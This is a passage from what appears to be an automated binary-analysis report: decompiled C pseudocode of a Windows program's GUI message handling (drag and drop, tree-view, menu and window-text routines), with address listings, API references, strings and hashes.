					if(_t385 == 0xffffff93) {
						ImageList_SetDragCursorImage( *0x4c685c, 0, 0, 0);
						ImageList_BeginDrag( *0x4c685c, 0, 0xfffffff8, 0xfffffff0);
						SetCapture(_a4);
						 *0x4c6860 = _a8;
						_v140 = 0;
						_v132 = 0;
						_v128 = 1;
						E00409A20(__ebx,  &_v140);
						_v140 = _a8;
						_v128 = 1;
						E00407F41(__ebx,  &_v116, __eflags, L"@GUI_DRAGID");
						E00408B13(0x4c7270, _t418, _t422, __eflags,  &_v120,  &_v144, 1);
						E00405A64( &_v132);
						_t439 = _t422 + 0x20;
						ClientToScreen( *_t422, _t439);
						ImageList_DragEnter(0,  *_t439,  *(_t422 + 0x24));
						E00409A20(__ebx,  &_v156);
					} else {
						__eflags = _t385 - 0xffffff94;
						if(_t385 == 0xffffff94) {
							_t440 =  *((intOrPtr*)(_t422 + 4));
							_t341 = E00402402(0x4c67b0, _t440,  &_v144,  &_v164);
							__eflags = _t341;
							if(_t341 != 0) {
								_t342 =  *0x4c6824; // 0xc29938
								_push(0);
								 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t342 + _v164.x * 4)))) + 0x96)) =  *(_t422 + 0x10);
								_push( *((intOrPtr*)(_t422 + 4)));
								E0048B60B();
								_t419 =  *0x4c6824; // 0xc29938
								_t414 = _v172;
								_t347 =  *((intOrPtr*)( *((intOrPtr*)(_t419 + _v172 * 4))));
								__eflags =  *(_t347 + 0x28);
								if( *(_t347 + 0x28) > 0) {
									 *0x4c67ec = _t440;
									E004081A7(0x4c67f0,  *((intOrPtr*)( *((intOrPtr*)(_t419 + _t414 * 4)))) + 0x24);
									_t352 =  *0x4c6824; // 0xc29938
									 *0x4c6800 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t352 + _v165 * 4)))) + 0x98));
									SendMessageW( *_t422, 0x1030,  *(_t422 + 0x10), 0x48b602);
								}
							}
						}
					}
					goto L12;
				}
				if(_t450 == 0) {
					L46:
					_t441 = 0;
					_t357 = SendMessageW( *_t422, 0x110a, 9, 0);
					__eflags = _t357;
					if(_t357 == 0) {
						goto L12;
					}
					_v92 = _t357;
					_v96 = 4;
					_t359 = SendMessageW( *_t422, 0x113e, 0,  &_v96);
					__eflags = _t359;
					if(_t359 == 0) {
						goto L12;
					}
					__eflags =  *(_t422 + 0x34) -  *((intOrPtr*)(_t422 + 0x5c));
					if( *(_t422 + 0x34) ==  *((intOrPtr*)(_t422 + 0x5c))) {
						goto L12;
					}
					__eflags =  *((intOrPtr*)(_t422 + 0xc)) - 0x1000;
					if( *((intOrPtr*)(_t422 + 0xc)) == 0x1000) {
						goto L12;
					}
					__eflags =  *((intOrPtr*)(_t422 + 0xc)) - 1;
					L26:
					if(__eflags == 0) {
						goto L12;
					}
					_push(_t441);
					_push(_v60);
					goto L45;
				}
				_t451 = _t385 - 0xfffffdd9;
				if(_t451 > 0) {
					__eflags = _t385 - 0xfffffdda;
					if(_t385 == 0xfffffdda) {
						_t362 = GetKeyState(0x11);
						__eflags = _t362;
						if(_t362 >= 0) {
							goto L12;
						}
						_t363 = GetKeyState(9);
						__eflags = _t363;
						if(_t363 >= 0) {
							goto L12;
						}
						_t443 = SendMessageW( *_t422, 0x130b, 0, 0);
						_t365 = GetKeyState(0x10);
						__eflags = _t365;
						if(_t365 >= 0) {
							_t444 = _t443 + 1;
							__eflags = _t444;
						} else {
							_t444 = _t443 - 1;
						}
						_push(_t444);
						L44:
						_push( *((intOrPtr*)(_t422 + 4)));
						goto L45;
					}
					__eflags = _t385 - 0xfffffdee;
					if(_t385 == 0xfffffdee) {
						__eflags =  *(_t426 + 0x188);
						if( *(_t426 + 0x188) == 0) {
							goto L12;
						}
						_t420 =  *0x4c6834; // 0x2
						_t417 = 3;
						__eflags = _t420 - _t417;
						if(_t420 < _t417) {
							goto L12;
						}
						_t445 =  *0x4c6824; // 0xc29938
						do {
							_t367 =  *( *(_t445 + _t417 * 4));
							__eflags = _t367;
							if(_t367 == 0) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t367 + 4)) - _v144;
							_t422 = _a12;
							if( *((intOrPtr*)(_t367 + 4)) != _v144) {
								goto L34;
							}
							__eflags = ( *(_t367 + 0x93) & 0x000000ff) -  *((intOrPtr*)(_t422 + 4));
							if(( *(_t367 + 0x93) & 0x000000ff) ==  *((intOrPtr*)(_t422 + 4))) {
								break;
							}
							L34:
							_t417 = _t417 + 1;
							__eflags = _t417 - _t420;
						} while (_t417 <= _t420);
						__eflags = _t417 - _t420;
						if(_t417 > _t420) {
							goto L12;
						}
						E004242EE(_t422 + 0x10,  *((intOrPtr*)( *( *(_t445 + _t417 * 4)) + 0x54)), 0x4f);
						__eflags = 0;
						 *((short*)(_t422 + 0xae)) = 0;
						goto L37;
					}
					__eflags = _t385 - 0xfffffe3d;
					if(_t385 == 0xfffffe3d) {
						goto L46;
					}
					__eflags = _t385 - 0xfffffe64;
					if(_t385 != 0xfffffe64) {
						goto L12;
					}
					_t374 =  *_t422;
					_v148 = _t374;
					_t375 = GetWindowLongW(_t374, 0xfffffff0);
					__eflags = _t375 & 0x00000100;
					if((_t375 & 0x00000100) == 0) {
						goto L12;
					}
					__eflags =  *((short*)(_t422 + 0xc)) - 0x20;
					if( *((short*)(_t422 + 0xc)) != 0x20) {
						goto L12;
					}
					_t441 = 0;
					_t376 = SendMessageW(_v148, 0x110a, 9, 0);
					__eflags = _t376;
					if(_t376 == 0) {
						goto L12;
					}
					_v92 = _t376;
					_v96 = 4;
					__eflags = SendMessageW(_v148, 0x113e, 0,  &_v96);
					goto L26;
				}
				if(_t451 == 0) {
					_push(SendMessageW( *_t422, 0x130b, 0, 0));
					goto L44;
				}
				if(_t385 == 0xfffffd09) {
					__eflags =  *((char*)(_t426 + 0x199));
					 *((char*)(_t426 + 0x19a)) = 1;
					if( *((char*)(_t426 + 0x199)) != 0) {
						goto L12;
					} else {
						 *((char*)(_t426 + 0x19a)) = 0;
						_push( *((intOrPtr*)(_t422 + 8)));
						goto L44;
					}
				}
				if(_t385 == 0xfffffd0e) {
					 *((char*)(_t426 + 0x199)) = 1;
					goto L12;
				}
				if(_t385 == 0xfffffd0f) {
					__eflags =  *((char*)(_t426 + 0x19a)) - 1;
					if( *((char*)(_t426 + 0x19a)) == 1) {
						_push(_t385);
						_push( *((intOrPtr*)(_t422 + 4)));
						E0048B60B();
					}
					 *((short*)(_t426 + 0x199)) = 0;
					goto L12;
				}
				if(_t385 != 0xfffffd16) {
					goto L12;
				} else {
					_push(_t385);
					goto L44;
				}
			}

0x0048cdc2
0x0048cdc7
0x0048cdcd
0x0048cdd0
0x0048cddc
0x0048cdde
0x0048cde1
0x0048cde5
0x0048cde7
0x0048d06f
0x0048d072
0x0048d219
0x0048d21c
0x0048d5d7
0x0048d5dc
0x0048d5e0
0x0048d5e3
0x0048ce47
0x0048ce50
0x0048ce56
0x0048ce5b
0x0048ce5b
0x0048d5e9
0x0048d5f2
0x0048d5f4
0x0048d5fa
0x0048d5fc
0x0048d606
0x0048d609
0x0048d609
0x0048d60a
0x0048d6c0
0x00000000
0x0048d6c0
0x0048d610
0x0048d610
0x0048d615
0x00000000
0x00000000
0x0048d61b
0x0048d622
0x0048d626
0x0048d628
0x0048d628
0x0048d63c
0x0048d641
0x0048d643
0x0048d64c
0x0048d651
0x0048d65f
0x0048d665
0x0048d66a
0x00000000
0x00000000
0x0048d66c
0x0048d670
0x0048d676
0x0048d68a
0x0048d68f
0x0048d692
0x0048d695
0x0048d697
0x0048d69a
0x0048d69a
0x0048d6a5
0x0048d6a8
0x0048d6aa
0x00000000
0x0048d6ac
0x0048d6ac
0x0048d6b1
0x0048d6b9
0x0048d6b9
0x00000000
0x0048d6b9
0x0048d6b3
0x0048d6b7
0x00000000
0x00000000
0x00000000
0x0048d6b7
0x0048d6aa
0x0048d67b
0x0048d67d
0x0048d684
0x00000000
0x00000000
0x00000000
0x0048d645
0x0048d645
0x0048d645
0x00000000
0x0048d645
0x0048d643
0x0048d5fe
0x0048d600
0x00000000
0x00000000
0x00000000
0x0048d600
0x0048d222
0x0048d225
0x0048d38a
0x0048d391
0x0048d39b
0x0048d3a8
0x0048d3b7
0x0048d3b9
0x0048d3bd
0x0048d3c1
0x0048d3c4
0x0048d3ee
0x0048d3ee
0x0048d3f3
0x0048d3fc
0x0048d402
0x0048d404
0x0048d501
0x0048d509
0x0048d51a
0x0048d520
0x0048d522
0x0048d588
0x0048d58f
0x0048d599
0x0048d5a3
0x0048d5a6
0x0048d5a8
0x00000000
0x00000000
0x0048d5c3
0x0048cfb2
0x0048cfb4
0x00000000
0x0048cfb4
0x0048d524
0x0048d535
0x0048d53d
0x0048d543
0x0048d548
0x00000000
0x00000000
0x0048d560
0x0048d565
0x0048d567
0x0048d580
0x0048d584
0x00000000
0x0048d584
0x0048d569
0x0048d56d
0x0048d572
0x0048d579
0x0048d57b
0x0048d57e
0x00000000
0x00000000
0x00000000
0x0048d57e
0x0048d40a
0x0048d40c
0x00000000
0x00000000
0x0048d418
0x0048d420
0x0048d431
0x0048d437
0x0048d43a
0x0048d4b9
0x0048d4c0
0x0048d4ca
0x0048d4d4
0x0048d4d7
0x0048d4d9
0x0048d4f0
0x0048d4f0
0x00000000
0x0048d4d9
0x0048d43c
0x0048d441
0x00000000
0x00000000
0x0048d443
0x0048d457
0x0048d462
0x0048d468
0x0048d46a
0x00000000
0x00000000
0x0048d470
0x0048d475
0x00000000
0x00000000
0x0048d48d
0x0048d492
0x0048d494
0x0048d4b1
0x0048d4b5
0x00000000
0x0048d4b5
0x0048d496
0x0048d49a
0x0048d49f
0x0048d4a6
0x0048d4a8
0x0048d4aa
0x00000000
0x00000000
0x0048d4ac
0x0048d4af
0x00000000
0x00000000
0x00000000
0x0048d4af
0x0048d3d6
0x0048d3d8
0x0048d3dc
0x0048d3e0
0x0048d3e3
0x00000000
0x00000000
0x0048d3e9
0x00000000
0x0048d3e9
0x0048d22b
0x0048d22e
0x00000000
0x00000000
0x0048d23e
0x0048d248
0x0048d255
0x0048d25f
0x0048d264
0x0048d267
0x00000000
0x00000000
0x0048d26d
0x0048d278
0x0048d27e
0x0048d280
0x00000000
0x00000000
0x0048d286
0x0048d288
0x0048d303
0x0048d30b
0x0048d31c
0x0048d322
0x0048d324
0x0048d32a
0x0048d33b
0x0048d343
0x0048d34b
0x0048d351
0x0048d356
0x0048d36c
0x0048d37b
0x0048d37b
0x0048d356
0x00000000
0x0048d324
0x0048d28a
0x0048d28c
0x00000000
0x00000000
0x0048d298
0x0048d2a0
0x0048d2b1
0x0048d2b7
0x0048d2ba
0x00000000
0x00000000
0x0048d2c0
0x0048d2d4
0x0048d2df
0x0048d2e5
0x0048d2ea
0x00000000
0x00000000
0x0048d2f0
0x0048d2f1
0x0048d002
0x0048d002
0x00000000
0x0048d002
0x0048d078
0x0048d20e
0x00000000
0x0048d20e
0x0048d07e
0x0048d084
0x0048d1fd
0x0048d203
0x00000000
0x0048d203
0x0048d08a
0x0048d090
0x00000000
0x00000000
0x0048d096
0x0048d099
0x0048d15b
0x0048d16e
0x0048d177
0x0048d184
0x0048d189
0x0048d18d
0x0048d191
0x0048d199
0x0048d1a6
0x0048d1af
0x0048d1b3
0x0048d1c8
0x0048d1d1
0x0048d1d6
0x0048d1dc
0x0048d1e9
0x0048d1f3
0x0048d09f
0x0048d09f
0x0048d0a2
0x0048d0a8
0x0048d0bb
0x0048d0c0
0x0048d0c2
0x0048d0c8
0x0048d0d1
0x0048d0dc
0x0048d0e3
0x0048d0e6
0x0048d0eb
0x0048d0f1
0x0048d0f8
0x0048d0fa
0x0048d0fe
0x0048d104
0x0048d118
0x0048d11d
0x0048d136
0x0048d145
0x0048d145
0x0048d0fe
0x0048d0c2
0x0048d0a2
0x00000000
0x0048d099
0x0048cded
0x0048d00c
0x0048d00c
0x0048d018
0x0048d01e
0x0048d020
0x00000000
0x00000000
0x0048d026
0x0048d037
0x0048d03f
0x0048d045
0x0048d047
0x00000000
0x00000000
0x0048d050
0x0048d053
0x00000000
0x00000000
0x0048d059
0x0048d060
0x00000000
0x00000000
0x0048d066
0x0048cf31
0x0048cf31
0x00000000
0x00000000
0x0048cf37
0x0048cf38
0x00000000
0x0048cf38
0x0048cdf8
0x0048cdfa
0x0048ce9d
0x0048cea3
0x0048cfc2
0x0048cfc4
0x0048cfc7
0x00000000
0x00000000
0x0048cfcf
0x0048cfd1
0x0048cfd4
0x00000000
0x00000000
0x0048cfed
0x0048cfef
0x0048cff5
0x0048cff8
0x0048cffd
0x0048cffd
0x0048cffa
0x0048cffa
0x0048cffa
0x0048cffe
0x0048cfff
0x0048cfff
0x00000000
0x0048cfff
0x0048cea9
0x0048ceaf
0x0048cf41
0x0048cf48
0x00000000
0x00000000
0x0048cf4e
0x0048cf56
0x0048cf57
0x0048cf59
0x00000000
0x00000000
0x0048cf5f
0x0048cf65
0x0048cf68
0x0048cf6a
0x0048cf6c
0x00000000
0x00000000
0x0048cf72
0x0048cf75
0x0048cf78
0x00000000
0x00000000
0x0048cf81
0x0048cf84
0x00000000
0x00000000
0x0048cf86
0x0048cf86
0x0048cf87
0x0048cf87
0x0048cf8b
0x0048cf8d
0x00000000
0x00000000
0x0048cfa1
0x0048cfa9
0x0048cfab
0x00000000
0x0048cfab
0x0048ceb5
0x0048cebb
0x00000000
0x00000000
0x0048cec1
0x0048cec7
0x00000000
0x00000000
0x0048cecd
0x0048ced2
0x0048ced6
0x0048cedc
0x0048cee1
0x00000000
0x00000000
0x0048cee7
0x0048ceec
0x00000000
0x00000000
0x0048cef2
0x0048cf00
0x0048cf06
0x0048cf08
0x00000000
0x00000000
0x0048cf0e
0x0048cf21
0x0048cf2f
0x00000000
0x0048cf2f
0x0048ce00
0x0048ce97
0x00000000
0x0048ce97
0x0048ce0c
0x0048ce67
0x0048ce6e
0x0048ce75
0x00000000
0x0048ce77
0x0048ce77
0x0048ce7e
0x00000000
0x0048ce7e
0x0048ce75
0x0048ce14
0x0048ce5e
0x00000000
0x0048ce5e
0x0048ce1c
0x0048ce2c
0x0048ce33
0x0048ce35
0x0048ce36
0x0048ce39
0x0048ce39
0x0048ce3e
0x00000000
0x0048ce3e
0x0048ce24
0x00000000
0x0048ce26
0x0048ce26
0x00000000
0x0048ce26

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0048CE50
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CE91
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0048CED6
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048CF00
SendMessageW.USER32 ref: 0048CF29
_wcsncpy.LIBCMT ref: 0048CFA1
GetKeyState.USER32(00000011), ref: 0048CFC2
GetKeyState.USER32(00000009), ref: 0048CFCF
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0048CFE5
GetKeyState.USER32(00000010), ref: 0048CFEF
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0048D018
SendMessageW.USER32 ref: 0048D03F
SendMessageW.USER32(?,00001030,?,0048B602), ref: 0048D145
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0048D15B
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0048D16E
SetCapture.USER32(?), ref: 0048D177
ClientToScreen.USER32(?,?), ref: 0048D1DC
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0048D1E9
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0048D203
ReleaseCapture.USER32(?,?,?), ref: 0048D20E
GetCursorPos.USER32(?), ref: 0048D248
ScreenToClient.USER32(?,?), ref: 0048D255
SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D2B1
SendMessageW.USER32 ref: 0048D2DF
SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D31C
SendMessageW.USER32 ref: 0048D34B
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0048D36C
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0048D37B
GetCursorPos.USER32(?), ref: 0048D39B
ScreenToClient.USER32(?,?), ref: 0048D3A8
GetParent.USER32(?), ref: 0048D3C8
SendMessageW.USER32(?,00001012,00000000,?), ref: 0048D431
SendMessageW.USER32 ref: 0048D462
ClientToScreen.USER32(?,?), ref: 0048D4C0
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0048D4F0
SendMessageW.USER32(?,00001111,00000000,?), ref: 0048D51A
SendMessageW.USER32 ref: 0048D53D
ClientToScreen.USER32(?,?), ref: 0048D58F
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0048D5C3

Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC

GetWindowLongW.USER32(?,000000F0), ref: 0048D65F

Strings

@GUI_DRAGID, xrefs: 0048D1AA
prL, xrefs: 0048D1BD
F, xrefs: 0048D543

Memory Dump Source

Source File: 00000000.00000002.610070755.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.610057645.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610303192.000000000048F000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610341432.00000000004B5000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.610359460.00000000004BF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610387011.00000000004C8000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
String ID: @GUI_DRAGID$F$prL
API String ID: 3977979337-935584803
Opcode ID: cce090fe27975b819c6da4113f7a9da79e1439fd4dc6cd031c8ae9bb968eb0d4
Instruction ID: 229d4578051541fcfaeada0f8769b60f9343d3431cda2b16350b0a1bbbc6a0ce
Opcode Fuzzy Hash: cce090fe27975b819c6da4113f7a9da79e1439fd4dc6cd031c8ae9bb968eb0d4
Instruction Fuzzy Hash: 6842BD30605240AFD720EF28C888F6EBBE5FF48314F144A2EF655972A1D7359845CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0048804A, Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571
windowCOMMONCrypto

Download Yara Rule

C-Code - Quality: 68%

			E0048804A(signed int _a4, long _a8, WCHAR* _a12) {
				signed int _v12;
				signed int _v16;
				intOrPtr _v32;
				WCHAR* _v36;
				intOrPtr _v40;
				signed char _v44;
				long _v48;
				void* _v52;
				signed int _v72;
				intOrPtr _v80;
				WCHAR* _v84;
				intOrPtr _v88;
				unsigned int _v92;
				intOrPtr _v96;
				long _v100;
				void* _v104;
				signed short _v114;
				signed short _v118;
				void* _v120;
				char _v124;
				signed int _v128;
				signed int _v140;
				void* _v148;
				void* _v152;
				intOrPtr _v160;
				intOrPtr _v164;
				signed int _v188;
				intOrPtr _v196;
				char _v200;
				void* __ebx;
				void* __edi;
				intOrPtr _t167;
				signed int _t169;
				signed int _t170;
				signed int _t177;
				long _t184;
				signed int _t186;
				void* _t189;
				short _t192;
				WCHAR* _t194;
				signed int _t198;
				long _t214;
				signed int _t220;
				long _t221;
				WCHAR* _t224;
				signed int _t225;
				long _t233;
				signed int _t235;
				signed int _t241;
				signed int _t244;
				long _t246;
				signed int _t248;
				signed int _t255;
				int _t256;
				long _t258;
				long _t260;
				int _t263;
				signed int _t265;
				long _t267;
				signed int _t272;
				long _t274;
				int _t280;
				WCHAR* _t281;
				struct HWND__** _t285;
				WCHAR* _t292;
				signed char _t321;
				signed int _t325;
				WCHAR* _t338;
				signed int _t339;
				signed int _t343;
				signed int _t345;
				signed int _t348;
				signed int _t350;
				void* _t356;
				int _t357;
				long _t361;
				struct HWND__* _t368;
				signed int _t370;
				WCHAR* _t372;
				int _t373;
				signed int _t376;

				if(E00402402(0x4c67b0, _a4,  &_v124,  &_v12) != 0) {
					_t167 =  *0x4c6824; // 0xc29938
					_t280 = _a8;
					 *_t280 =  *_t280 | 0xffffffff;
					_t285 =  *( *(_t167 + _v12 * 4));
					_v12 = _t285;
					_t169 = _t285[0x24] & 0x000000ff;
					_t368 =  *_t285;
					_a8 = _t368;
					__eflags = _t169 - 0x11;
					if(__eflags > 0) {
						__eflags = _t169 - 0x12;
						if(_t169 == 0x12) {
							__eflags = 0;
							_push(0);
							_push(0);
							_push(0x400);
							L88:
							_t170 = SendMessageW(_t368, ??, ??, ??);
							L89:
							 *_t280 = _t170;
							goto L90;
						}
						__eflags = _t169 - 0x13;
						if(_t169 == 0x13) {
							 *_t280 = SendMessageW(_t368, 0x100c, 0xffffffff, 2);
							E00423020( &_v104, 0, 0x34);
							_v100 =  *_t280;
							_v104 = 4;
							_t177 = SendMessageW(_a8, 0x104b, 0,  &_v104);
							asm("sbb eax, eax");
							_t170 =  ~_t177 & _v72;
							goto L89;
						}
						__eflags = _t169 - 0x14;
						if(_t169 == 0x14) {
							 *_t280 =  *_t280 | 0xffffffff;
							_a8 = GetWindowLongW(_t285[0xd], 0xffffffec);
							E00423020( &_v104, 0, 0x34);
							_t370 = _v12;
							_v140 = _a4;
							_v148 = 1;
							_t184 = SendMessageW( *(_t370 + 0x34), 0x1053, 0xffffffff,  &_v148);
							_v100 = _t184;
							__eflags = _t184 - 0xffffffff;
							if(_t184 == 0xffffffff) {
								goto L90;
							}
							__eflags = _a8 & 0x00000004;
							if(__eflags == 0) {
								L81:
								_t281 = E00420FF6(_t280, 0, __eflags, 0x2000);
								_v104 = 1;
								_t338 = _t281;
								_v80 = 0xfff;
								_a12 = _t338;
								__eflags = 0 -  *((intOrPtr*)(_t370 + 0x94));
								_t186 = 0;
								while(1) {
									_a4 = _t186;
									_v96 = _t186;
									_push( &_v104);
									_push(0);
									_push(0x104b);
									_push( *(_t370 + 0x34));
									_v84 = _t338;
									if(__eflags >= 0) {
										break;
									}
									SendMessageW();
									_t189 = E00422E3C(_a12);
									_v80 = 0xffe;
									__eflags = 0xffe - _t189;
									if(0xffe - _t189 <= 0) {
										L26:
										return _t281;
									}
									_t292 =  &(_t281[E00422E3C(_t281)]);
									_t192 =  *0x4c67c4; // 0x7c
									 *_t292 = _t192;
									_t292[1] = 0;
									_t194 = CharNextW(_t292);
									_t338 = _t194;
									_a12 = _t194;
									_t186 = _a4 + 1;
									__eflags = _t186 -  *((short*)(_t370 + 0x94));
								}
								SendMessageW();
								goto L26;
							}
							__eflags = _a12;
							if(__eflags == 0) {
								goto L81;
							}
							_v104 = 8;
							_v88 = 0xf000;
							_t198 = SendMessageW( *(_t370 + 0x34), 0x104b, 0,  &_v104);
							__eflags = _t198;
							if(_t198 == 0) {
								goto L90;
							}
							asm("sbb eax, eax");
							_t170 = ( ~((_v92 >> 0xc) - 1) & 0xfffffffd) + 4;
							goto L89;
						}
						__eflags = _t169 - 0x15;
						if(_t169 == 0x15) {
							__eflags = _t285[0x1f] - 4;
							if(_t285[0x1f] != 4) {
								_t170 = E00409C9C( &(_t285[0x1c]));
								goto L89;
							}
							_t282 =  &(_t285[0x1c]);
							E00409997(_t169,  &(_t285[0x1c]),  &(_t285[0x1c]));
							_t339 = 2;
							_t356 = E00420FF6(_t282, 0, __eflags,  ~(0 | __eflags > 0x00000000) | ( *((intOrPtr*)(_t282[2] + 4)) + 0x00000001) * _t339);
							E00409997(E00409997(_t209, _t282, _t282), _t282, _t282);
							E0040463E(_t356,  *(_t282[2]),  *((intOrPtr*)(_t282[2] + 4)) + 1);
							return _t356;
						}
						__eflags = _t169 - 0x18;
						if(__eflags <= 0) {
							L72:
							_t214 = SendMessageW(_t368, 0xe, 0, 0);
							_t343 = 2;
							_t100 = _t214 + 1; // 0x1
							_t357 = _t100;
							_t372 = E00420FF6(_t280, _t357, __eflags,  ~(0 | __eflags > 0x00000000) | _t357 * _t343);
							GetWindowTextW(_a8, _t372, _t357);
							L13:
							return _t372;
						}
						__eflags = _t169 - 0x1a;
						if(_t169 <= 0x1a) {
							__eflags = _a12;
							_push(0);
							_push(0);
							if(__eflags == 0) {
								_t220 = SendMessageW(_t368, 0xf0, ??, ??);
								 *_t280 = _t220;
								__eflags = _t220;
								if(_t220 == 0) {
									 *_t280 = 4;
								}
								goto L90;
							}
							_t221 = SendMessageW(_t368, 0xe, ??, ??);
							_t345 = 2;
							_t89 = _t221 + 1; // 0x1
							_t373 = _t89;
							_t224 = E00420FF6(_t280, 0, __eflags,  ~(0 | __eflags > 0x00000000) | _t373 * _t345);
							_a12 = _t224;
							_t225 = GetWindowTextW(_a8, _t224, _t373);
							__eflags = _t225;
							if(_t225 != 0) {
								return _a12;
							}
							_push(_a12);
							 *_t280 = 0;
							L28:
							L0042106C();
							goto L90;
						}
						__eflags = _t169 - 0x1c;
						if(__eflags != 0) {
							goto L72;
						}
						__eflags = SendMessageW(_t368, 0x1001, 0,  &_v120);
						if(__eflags == 0) {
							 *_t280 = 0;
							goto L90;
						}
						_t372 = E00420FF6(_t280, 0, __eflags, 0x16);
						wsprintfW(_t372, L"%d/%02d/%02d", _v120 & 0x0000ffff, _v118 & 0x0000ffff, _v114 & 0x0000ffff);
						goto L13;
					}
					if(__eflags == 0) {
						_v48 = _t285[4];
						 *_t280 = 0;
						_t233 = GetWindowLongW(_t285[0xd], 0xfffffff0);
						__eflags = _a12;
						_a4 = _t233;
						_v52 = 8;
						_v40 = 0xf000;
						if(__eflags == 0) {
							_t235 = SendMessageW( *(_v12 + 0x34), 0x113e, 0,  &_v52);
							__eflags = _t235;
							if(_t235 != 0) {
								_t321 = _v44;
								__eflags = _a4 & 0x00000100;
								if((_a4 & 0x00000100) != 0) {
									asm("sbb eax, eax");
									_t241 = ( ~((_t321 >> 0xc) - 1) & 0xfffffffd) + 4;
									__eflags = _t241;
									 *_t280 = _t241;
								}
								__eflags = _t321 & 0x00000002;
								if((_t321 & 0x00000002) != 0) {
									 *_t280 =  *_t280 | 0x00000100;
									__eflags =  *_t280;
								}
								__eflags = _t321 & 0x00000020;
								if((_t321 & 0x00000020) != 0) {
									 *_t280 =  *_t280 | 0x00000400;
									__eflags =  *_t280;
								}
								__eflags = _t321 & 0x00000010;
								if((_t321 & 0x00000010) != 0) {
									 *_t280 =  *_t280 | 0x00000200;
								}
							}
							goto L90;
						}
						_t281 = E00420FF6(_t280, 0, __eflags, 0x2000);
						_push( &_v52);
						_push(0);
						_push(0x113e);
						_push( *(_v12 + 0x34));
						L25:
						_v32 = 0xfff;
						_v36 = _t281;
						_v52 = 1;
						_t244 = SendMessageW(??, ??, ??, ??);
						__eflags = _t244;
						if(_t244 == 0) {
							_push(_t281);
							goto L28;
						}
						goto L26;
					}
					__eflags = _t169 - 0xa;
					if(__eflags > 0) {
						__eflags = _t169 - 0xc;
						if(_t169 == 0xc) {
							 *_t280 =  *_t280 & 0;
							goto L90;
						}
						__eflags = _t169 - 0xd;
						if(__eflags <= 0) {
							goto L72;
						}
						__eflags = _t169 - 0xf;
						if(_t169 <= 0xf) {
							__eflags = IsMenu(_t285[3]);
							if(__eflags == 0) {
								goto L90;
							}
							_t246 = E00420FF6(_t280, 0, __eflags, 0x208);
							__eflags = _a12;
							_t361 = _t246;
							_t376 = _v12;
							_a8 = _t361;
							_v200 = 0x30;
							_push( &_v200);
							if(_a12 == 0) {
								_v196 = 1;
								_t248 = GetMenuItemInfoW( *(_t376 + 0xc), _a4, 0, ??);
								_push(_t361);
								__eflags = _t248;
								if(_t248 == 0) {
									goto L28;
								}
								L0042106C();
								_t325 = _v188;
								 *_t280 = _t325;
								asm("sbb eax, eax");
								_t255 = ( ~(_t325 & 0x00000003) & 0x00000040) + 0x40;
								__eflags = _t325 & 0x00008080;
								if((_t325 & 0x00008080) != 0) {
									_t255 = _t255 | 0x00000100;
									__eflags = _t255;
								}
								__eflags = _t325 & 0x00000008;
								if((_t325 & 0x00000008) == 0) {
									_t170 = _t255 | 0x00000004;
									__eflags = _t170;
								} else {
									_t170 = _t255 | 0x00000001;
								}
								__eflags = _t325 & 0x00001000;
								if((_t325 & 0x00001000) != 0) {
									_t170 = _t170 | 0x00000200;
								}
								goto L89;
							}
							_v164 = _t361;
							_v196 = 0x10;
							_v160 = 0x104;
							_t256 = GetMenuItemInfoW( *(_t376 + 0xc), _a4, 0, ??);
							__eflags = _t256;
							if(_t256 != 0) {
								return _a8;
							}
							_push(_a8);
							 *_t280 = 0;
							goto L28;
						}
						__eflags = _t169 - 0x10;
						if(__eflags != 0) {
							goto L72;
						}
						 *_t280 = 0;
						_t258 = SendMessageW(_t368, 0x110a, 9, 0);
						__eflags = _t258;
						if(_t258 == 0) {
							goto L90;
						}
						__eflags = _a12;
						_v48 = _t258;
						_v52 = 4;
						if(__eflags == 0) {
							_t260 = SendMessageW(_t368, 0x113e, 0,  &_v52);
							__eflags = _t260;
							if(_t260 == 0) {
								goto L90;
							}
							_t170 = _v16;
							goto L89;
						}
						_t281 = E00420FF6(_t280, 0, __eflags, 0x2000);
						_push( &_v52);
						_push(0);
						_push(0x113e);
						_push(_t368);
						goto L25;
					}
					if(__eflags == 0) {
						_t263 = SendMessageW(_t368, 0x130b, 0, 0);
						__eflags = _a12;
						 *_t280 = _t263;
						if(_a12 == 0) {
							goto L90;
						}
						_v152 = 8;
						SendMessageW(_t368, 0x133c, _t263,  &_v152);
						_t170 = _v128;
						goto L89;
					}
					_t265 = _t169;
					__eflags = _t265;
					if(_t265 == 0) {
						_t280 = SendMessageW(_t368, 0x147, 0, 0);
						__eflags = _t280 - 0xffffffff;
						if(__eflags == 0) {
							goto L72;
						}
						_t267 = SendMessageW(_t368, 0x149, _t280, 0);
						_t348 = 2;
